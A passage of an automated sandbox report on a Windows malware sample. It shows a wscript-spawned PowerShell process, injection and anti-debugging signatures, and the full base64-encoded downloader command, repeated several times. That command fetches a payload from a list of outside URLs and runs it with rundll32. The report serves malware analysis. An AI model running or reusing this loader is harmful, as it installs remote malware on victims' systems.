ABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABcAFQAZQBuAGQAaQBuAGUAYQBsAEEAdAB0AGkAdAB1AGQAaQBuAGkAegBlAHIALgBMAGUAcAByAG8AcwBlAEIAdQBjAGMAYQBuAGUAZQByAGkAbgBnACwATgBpAGsAbgA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQATgBvAG4AZABlAHAAcgBlAHMAcwBlAGQAUgBvAG0AYgBvAHcAbABpAG4AZQAgAD0AIAAoACIAaAB0AHQAcABzADoALwAvAHIAegBiAHAAbwAuAGMAbwBtAC4AYgByAC8AMABNAHEAYQBFAC8AZQBiAEsAVgAxADAALABoAHQAdABwAHMAOgAvAC8AbQBtAGgAaABmAC4AYwBvAG0ALwBjAHkAbwBhAEwAQwBqAC8AbQBYAEIAcgBDAGsAVgBSAFQALABoAHQAdABwAHMAOgAvAC8AZwByAGEAcABoAGkAeABjAHIAZQBhAHQAaQB2AGkAdAB5AC4AYwBvAG0ALwBNAG8ASgBCAFEALwA3AFIANgBrAE4ATQBxAHMAVgBmAHoAcwAsAGgAdAB0AHAAcwA6AC8ALwBzAHQAcgBhAGcAaQBjAGkAYQBuAC4AYwBvAG0ALwB1AHEANgAzAGwALwB2AGIAZwBKAEsAaABaAGwANQBBAGsALABoAHQAdABwAHMAOgAvAC8AcwBvAGEAcgBlAHMAZABlAHMAaQBnAG4AZQByAC4AYwBvAG0ALgBiAHIALwBRAGsAUwB3AHAAOAAvAG8ASgA5AGQARQBpAHoALABoAHQAdABwAHMAOgAvAC8AYQBsAG8AcwB0AG8AbwBsAC0AcwBhAC4AYwBvAG0ALwBYAHMAWABZAG8AZAAvAHIAMABCAEgASwBMAFEASABUAG4ATAAsAGgAdAB0AHAAcwA6AC8ALwBuAGUAdAB1AGwAdAByAGEALgBjAG8AbQAuAGIAcgAvAGIAUwBxAEEATQBpAC8ANgA5ADEAOAByAG0ATQAxAEwAUwAsAGgAdAB0AHAAcwA6AC8ALwBiAHkAdABlAGQAZQBzAGkAZwBuAC4AbgBlAHQALwB2AFAAcQB5AFcAeABiAC8AMAAyADAANAAyADMALgBnAGkAZgAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABMAGEAdABlAHcAaABpAGwAZQBzAFAAcgBlAHMAcABlAGMAaQBmAGkAZQBkACAAaQBuACAAJABOAG8AbgBkAGUAcAByAGUAcwBzAGUAZABSAG8AbQBiAG8AdwBsAGkAbgBlACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABMAGEAdABlAHcAaABpAGwAZQBzAFAAcgBlAHMAcABlAGMAaQBmAGkAZQBkACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA3ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABUAGUAbgBkAGkAbgBlAGEAbABBAHQAdABpAHQAdQBkAGkAbgBpAHoAZQByAC4ATABlAHAAcgBvAHMAZQBCAHUAYwBjAGEAbgBlAGUAcgBpAG4AZwA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAFQAZQBuAGQAaQBuAGUAYQBsAEEAdAB0AGkAdAB1AGQAaQBuAGkAegBlAHIALgBMAGUAcAByAG8AcwBlAEIAdQBjAGMAYQBuAGUAZQByAGkAbgBnACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcwB0AGEAcgB0ACAAcgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABcAFQAZQBuAGQAaQBuAGUAYQBsAEEAdAB0AGkAdAB1AGQAaQBuAGkAegBlAHIALgBMAGUAcAByAG8AcwBlAEIAdQBjAGMAYQBuAGUAZQByAGkAbgBnACwATgBpAGsAbgA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQATgBvAG4AZABlAHAAcgBlAHMAcwBlAGQAUgBvAG0AYgBvAHcAbABpAG4AZQAgAD0AIAAoACIAaAB0AHQAcABzADoALwAvAHIAegBiAHAAbwAuAGMAbwBtAC4AYgByAC8AMABNAHEAYQBFAC8AZQBiAEsAVgAxADAALABoAHQAdABwAHMAOgAvAC8AbQBtAGgAaABmAC4AYwBvAG0ALwBjAHkAbwBhAEwAQwBqAC8AbQBYAEIAcgBDAGsAVgBSAFQALABoAHQAdABwAHMAOgAvAC8AZwByAGEAcABoAGkAeABjAHIAZQBhAHQAaQB2AGkAdAB5AC4AYwBvAG0ALwBNAG8ASgBCAFEALwA3AFIANgBrAE4ATQBxAHMAVgBmAHoAcwAsAGgAdAB0AHAAcwA6AC8ALwBzAHQAcgBhAGcAaQBjAGkAYQBuAC4AYwBvAG0ALwB1AHEANgAzAGwALwB2AGIAZwBKAEsAaABaAGwANQBBAGsALABoAHQAdABwAHMAOgAvAC8AcwBvAGEAcgBlAHMAZABlAHMAaQBnAG4AZQByAC4AYwBvAG0ALgBiAHIALwBRAGsAUwB3AHAAOAAvAG8ASgA5AGQARQBpAHoALABoAHQAdABwAHMAOgAvAC8AYQBsAG8AcwB0AG8AbwBsAC0AcwBhAC4AYwBvAG0ALwBYAHMAWABZAG8AZAAvAHIAMABCAEgASwBMAFEASABUAG4ATAAsAGgAdAB0AHAAcwA6AC8ALwBuAGUAdAB1AGwAdAByAGEALgBjAG8AbQAuAGIAcgAvAGIAUwBxAEEATQBpAC8ANgA5ADEAOAByAG0ATQAxAEwAUwAsAGgAdAB0AHAAcwA6AC8ALwBiAHkAdABlAGQAZQBzAGkAZwBuAC4AbgBlAHQALwB2AFAAcQB5AFcAeABiAC8AMAAyADAANAAyADMALgBnAGkAZgAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABMAGEAdABlAHcAaABpAGwAZQBzAFAAcgBlAHMAcABlAGMAaQBmAGkAZQBkACAAaQBuACAAJABOAG8AbgBkAGUAcAByAGUAcwBzAGUAZABSAG8AbQBiAG8AdwBsAGkAbgBlACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABMAGEAdABlAHcAaABpAGwAZQBzAFAAcgBlAHMAcABlAGMAaQBmAGkAZQBkACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA3ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABUAGUAbgBkAGkAbgBlAGEAbABBAHQAdABpAHQAdQBkAGkAbgBpAHoAZQByAC4ATABlAHAAcgBvAHMAZQBCAHUAYwBjAGEAbgBlAGUAcgBpAG4AZwA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAFQAZQBuAGQAaQBuAGUAYQBsAEEAdAB0AGkAdAB1AGQAaQBuAGkAegBlAHIALgBMAGUAcAByAG8AcwBlAEIAdQBjAGMAYQBuAGUAZQByAGkAbgBnACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcwB0AGEAcgB0ACAAcgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABcAFQAZQBuAGQAaQBuAGUAYQBsAEEAdAB0AGkAdAB1AGQAaQBuAGkAegBlAHIALgBMAGUAcAByAG8AcwBlAEIAdQBjAGMAYQBuAGUAZQByAGkAbgBnACwATgBpAGsAbgA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"
filepath: powershell
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
parent_process wscript.exe martian_process powershell -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQATgBvAG4AZABlAHAAcgBlAHMAcwBlAGQAUgBvAG0AYgBvAHcAbABpAG4AZQAgAD0AIAAoACIAaAB0AHQAcABzADoALwAvAHIAegBiAHAAbwAuAGMAbwBtAC4AYgByAC8AMABNAHEAYQBFAC8AZQBiAEsAVgAxADAALABoAHQAdABwAHMAOgAvAC8AbQBtAGgAaABmAC4AYwBvAG0ALwBjAHkAbwBhAEwAQwBqAC8AbQBYAEIAcgBDAGsAVgBSAFQALABoAHQAdABwAHMAOgAvAC8AZwByAGEAcABoAGkAeABjAHIAZQBhAHQAaQB2AGkAdAB5AC4AYwBvAG0ALwBNAG8ASgBCAFEALwA3AFIANgBrAE4ATQBxAHMAVgBmAHoAcwAsAGgAdAB0AHAAcwA6AC8ALwBzAHQAcgBhAGcAaQBjAGkAYQBuAC4AYwBvAG0ALwB1AHEANgAzAGwALwB2AGIAZwBKAEsAaABaAGwANQBBAGsALABoAHQAdABwAHMAOgAvAC8AcwBvAGEAcgBlAHMAZABlAHMAaQBnAG4AZQByAC4AYwBvAG0ALgBiAHIALwBRAGsAUwB3AHAAOAAvAG8ASgA5AGQARQBpAHoALABoAHQAdABwAHMAOgAvAC8AYQBsAG8AcwB0AG8AbwBsAC0AcwBhAC4AYwBvAG0ALwBYAHMAWABZAG8AZAAvAHIAMABCAEgASwBMAFEASABUAG4ATAAsAGgAdAB0AHAAcwA6AC8ALwBuAGUAdAB1AGwAdAByAGEALgBjAG8AbQAuAGIAcgAvAGIAUwBxAEEATQBpAC8ANgA5ADEAOAByAG0ATQAxAEwAUwAsAGgAdAB0AHAAcwA6AC8ALwBiAHkAdABlAGQAZQBzAGkAZwBuAC4AbgBlAHQALwB2AFAAcQB5AFcAeABiAC8AMAAyADAANAAyADMALgBnAGkAZgAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABMAGEAdABlAHcAaABpAGwAZQBzAFAAcgBlAHMAcABlAGMAaQBmAGkAZQBkACAAaQBuACAAJABOAG8AbgBkAGUAcAByAGUAcwBzAGUAZABSAG8AbQBiAG8AdwBsAGkAbgBlACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABMAGEAdABlAHcAaABpAGwAZQBzAFAAcgBlAHMAcABlAGMAaQBmAGkAZQBkACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA3ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABUAGUAbgBkAGkAbgBlAGEAbABBAHQAdABpAHQAdQBkAGkAbgBpAHoAZQByAC4ATABlAHAAcgBvAHMAZQBCAHUAYwBjAGEAbgBlAGUAcgBpAG4AZwA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAFQAZQBuAGQAaQBuAGUAYQBsAEEAdAB0AGkAdAB1AGQAaQBuAGkAegBlAHIALgBMAGUAcAByAG8AcwBlAEIAdQBjAGMAYQBuAGUAZQByAGkAbgBnACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcwB0AGEAcgB0ACAAcgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABcAFQAZQBuAGQAaQBuAGUAYQBsAEEAdAB0AGkAdAB1AGQAaQBuAGkAegBlAHIALgBMAGUAcAByAG8AcwBlAEIAdQBjAGMAYQBuAGUAZQByAGkAbgBnACwATgBpAGsAbgA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA7ACQATgBvAG4AZABlAHAAcgBlAHMAcwBlAGQAUgBvAG0AYgBvAHcAbABpAG4AZQAgAD0AIAAoACIAaAB0AHQAcABzADoALwAvAHIAegBiAHAAbwAuAGMAbwBtAC4AYgByAC8AMABNAHEAYQBFAC8AZQBiAEsAVgAxADAALABoAHQAdABwAHMAOgAvAC8AbQBtAGgAaABmAC4AYwBvAG0ALwBjAHkAbwBhAEwAQwBqAC8AbQBYAEIAcgBDAGsAVgBSAFQALABoAHQAdABwAHMAOgAvAC8AZwByAGEAcABoAGkAeABjAHIAZQBhAHQAaQB2AGkAdAB5AC4AYwBvAG0ALwBNAG8ASgBCAFEALwA3AFIANgBrAE4ATQBxAHMAVgBmAHoAcwAsAGgAdAB0AHAAcwA6AC8ALwBzAHQAcgBhAGcAaQBjAGkAYQBuAC4AYwBvAG0ALwB1AHEANgAzAGwALwB2AGIAZwBKAEsAaABaAGwANQBBAGsALABoAHQAdABwAHMAOgAvAC8AcwBvAGEAcgBlAHMAZABlAHMAaQBnAG4AZQByAC4AYwBvAG0ALgBiAHIALwBRAGsAUwB3AHAAOAAvAG8ASgA5AGQARQBpAHoALABoAHQAdABwAHMAOgAvAC8AYQBsAG8AcwB0AG8AbwBsAC0AcwBhAC4AYwBvAG0ALwBYAHMAWABZAG8AZAAvAHIAMABCAEgASwBMAFEASABUAG4ATAAsAGgAdAB0AHAAcwA6AC8ALwBuAGUAdAB1AGwAdAByAGEALgBjAG8AbQAuAGIAcgAvAGIAUwBxAEEATQBpAC8ANgA5ADEAOAByAG0ATQAxAEwAUwAsAGgAdAB0AHAAcwA6AC8ALwBiAHkAdABlAGQAZQBzAGkAZwBuAC4AbgBlAHQALwB2AFAAcQB5AFcAeABiAC8AMAAyADAANAAyADMALgBnAGkAZgAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABMAGEAdABlAHcAaABpAGwAZQBzAFAAcgBlAHMAcABlAGMAaQBmAGkAZQBkACAAaQBuACAAJABOAG8AbgBkAGUAcAByAGUAcwBzAGUAZABSAG8AbQBiAG8AdwBsAGkAbgBlACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABMAGEAdABlAHcAaABpAGwAZQBzAFAAcgBlAHMAcABlAGMAaQBmAGkAZQBkACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA3ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABUAGUAbgBkAGkAbgBlAGEAbABBAHQAdABpAHQAdQBkAGkAbgBpAHoAZQByAC4ATABlAHAAcgBvAHMAZQBCAHUAYwBjAGEAbgBlAGUAcgBpAG4AZwA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAFQAZQBuAGQAaQBuAGUAYQBsAEEAdAB0AGkAdAB1AGQAaQBuAGkAegBlAHIALgBMAGUAcAByAG8AcwBlAEIAdQBjAGMAYQBuAGUAZQByAGkAbgBnACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcwB0AGEAcgB0ACAAcgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABcAFQAZQBuAGQAaQBuAGUAYQBsAEEAdAB0AGkAdAB1AGQAaQBuAGkAegBlAHIALgBMAGUAcAByAG8AcwBlAEIAdQBjAGMAYQBuAGUAZQByAGkAbgBnACwATgBpAGsAbgA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"
Process injection Process 2532 resumed a thread in remote process 2672
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000144
suspend_count: 1
process_identifier: 2672
1 0 0
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe